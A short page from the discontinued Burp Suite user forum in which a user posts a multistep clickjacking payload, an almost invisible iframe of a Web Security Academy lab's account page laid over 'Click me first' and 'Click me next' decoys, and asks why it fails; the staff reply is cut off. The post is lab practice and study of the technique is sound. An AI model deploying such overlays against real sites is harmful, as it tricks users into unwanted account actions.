The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Multistep clickjacking output not working despite proper alignment of text

R | Last updated: Aug 19, 2024 09:23AM UTC

<style> iframe { position: relative; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } .firstClick, .secondClick { position: absolute; top:420px; left:60px; z-index: 1; } .secondClick { top: 500px; left:60px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://0a3f005c03deae2d8029bc3500ac001a.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 12:41PM UTC